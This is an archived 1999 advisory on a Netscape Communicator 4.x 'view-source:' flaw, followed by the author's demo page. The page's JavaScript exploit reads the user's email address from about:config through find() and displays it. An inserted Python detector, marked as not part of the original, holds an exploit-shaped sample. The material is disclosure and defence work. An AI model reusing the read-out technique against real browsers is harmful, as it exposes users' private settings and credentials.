TUCoPS :: Browsers :: nsview~1.txt

Netscape Communicator "view-source:" security vulnerabilities.


[ http://www.rootshell.com/ ]

Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski <joro@NAT.BG>
Subject: Netscape Communicator "view-source:" security vulnerabilities

There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07
Linux (probably all 4.x versions) in the way it handles
"view-source:wysiwyg://1/javascript" URLs: it parses them in a "view-source"
window. The problem is that this allows access to documents included in the
parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(), which
allows reading the whole parsed document.

Vulnerabilities:

 Browsing local directories
 Reading user's cache
 Reading parsed HTML files
 Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
 Probably others

This vulnerability may be exploited by using an HTML email message.
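As an added defender-side illustration (not part of the advisory or the demo page), the following Python script scans an HTML document, such as an incoming HTML email body, for the ingredients described above: a "view-source:" URL in a URL-bearing attribute, a LAYER/ILAYER whose SRC pulls in about:config, and inline script that assembles a "view-source:" URL and calls find(). The two sample documents are constructed here and modelled on the pattern above; the finding names and the URL_ATTRS set are my own assumptions.

```python
"""Flag HTML that carries the Netscape 4.x "view-source:wysiwyg://" pattern
described in the advisory, e.g. in an incoming HTML e-mail body."""
import re
from html.parser import HTMLParser

# Attributes the browser resolves as URLs (assumed set; extend as needed).
URL_ATTRS = {"src", "href", "action", "background", "data"}

VIEW_SOURCE_RE = re.compile(r"view-source\s*:", re.IGNORECASE)
ABOUT_CONFIG_RE = re.compile(r"about\s*:\s*config", re.IGNORECASE)
FIND_CALL_RE = re.compile(r"\bfind\s*\(")


class ViewSourceScanner(HTMLParser):
    """Collects (kind, tag, detail) tuples while parsing the document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._script_buf = None  # list of text chunks while inside <SCRIPT>

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag == "script":
            self._script_buf = []
        for name, value in attrs:
            if value is None:
                continue
            name = name.lower()
            # URL attributes and on* event handlers can both carry a URL.
            if name in URL_ATTRS or name.startswith("on"):
                self._check_url(tag, name, value)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._script_buf is not None:
            self._check_script("".join(self._script_buf))
            self._script_buf = None

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def _check_url(self, tag, attr, value):
        # Any view-source: URL in markup is the core of the advisory.
        if VIEW_SOURCE_RE.search(value):
            self.findings.append(("view-source-url", tag, f"{attr}={value}"))
        # A layer pulling in about:config is what exposes the mail prefs.
        if tag in ("layer", "ilayer") and ABOUT_CONFIG_RE.search(value):
            self.findings.append(("about-config-layer", tag, f"{attr}={value}"))

    def _check_script(self, body):
        # The demo assembles the view-source: URL inside a script, so the
        # literal scheme appears in the script text even when no attribute
        # carries it directly.
        if VIEW_SOURCE_RE.search(body):
            self.findings.append(("view-source-in-script", "script",
                                  "view-source: URL assembled in script"))
            # find() is the character-by-character read primitive.
            if FIND_CALL_RE.search(body):
                self.findings.append(("find-oracle-in-script", "script",
                                      "find() used together with view-source:"))


def scan_html(text):
    """Return the list of findings for one HTML document."""
    scanner = ViewSourceScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


def is_suspicious(text):
    return bool(scan_html(text))


# Constructed samples (not the advisory's demo page): one mimicking its
# structure, one ordinary page that should produce no findings.
SUSPICIOUS_SAMPLE = """<HTML><BODY>
<ILAYER SRC="view-source:wysiwyg://1/about:config"></ILAYER>
<SCRIPT>
s = "view-source:wysiwyg://1/javascript:s='vvvv'";
res = "";
if (find(res, true, true)) { res = res; }
location = s;
</SCRIPT>
</BODY></HTML>"""

BENIGN_SAMPLE = """<HTML><BODY>
<A HREF="http://www.example.com/">link</A>
<ILAYER SRC="menu.html"></ILAYER>
<SCRIPT>document.title = "hello";</SCRIPT>
</BODY></HTML>"""

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, "->", scan_html(doc) or "no findings")
```

The scanner buffers script text until the closing tag rather than inspecting each data chunk, so a "view-source:" string split across parser chunks is still caught; a mail gateway would run scan_html over each text/html part and quarantine or strip script on any finding.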

Workaround: Disable JavaScript
Netscape has been notified of the problem.

Demonstration is available at: http://www.nat.bg/~joro/viewsource.html

Regards,
Georgi Guninski
 http://www.nat.bg/~joro
 http://www.whitehats.com/guninski
-----------------------------------------------------------------------------------------------------

<http://www.nat.bg/~joro/viewsource.html>

<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way 
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via 
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilities:
<HR>
 Browsing local directories<BR>
 Reading user's cache<BR>
 Reading parsed HTML files<BR>
 Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
 Probably others<BR>
<BR>
This vulnerability may be exploited by using an HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>

s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv&gt>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+"   t=res + String.fromCharCode(c);"
+"     if (find(t,true,true)) {"
+"      res=t;"
+"      if (c==32) i=charstoread+1"
+"     } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;


</SCRIPT>

